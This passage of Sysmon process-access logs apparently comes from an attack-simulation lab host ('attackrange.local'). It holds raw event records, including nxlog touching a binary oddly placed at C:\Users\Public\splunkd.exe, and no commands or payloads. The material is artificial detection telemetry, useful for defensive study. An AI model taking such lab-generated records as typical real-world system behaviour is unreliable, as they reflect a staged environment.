{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2918,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2919,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2920,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2921,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2922,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2923,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:29.568\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10B5-5F25-0000-0010E5F70400}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:29.568","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10B5-5F25-0000-0010E5F70400}","TargetProcessId":"4692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2924,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:30.257\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:30.257","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2925,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:31.260\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:31.260","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 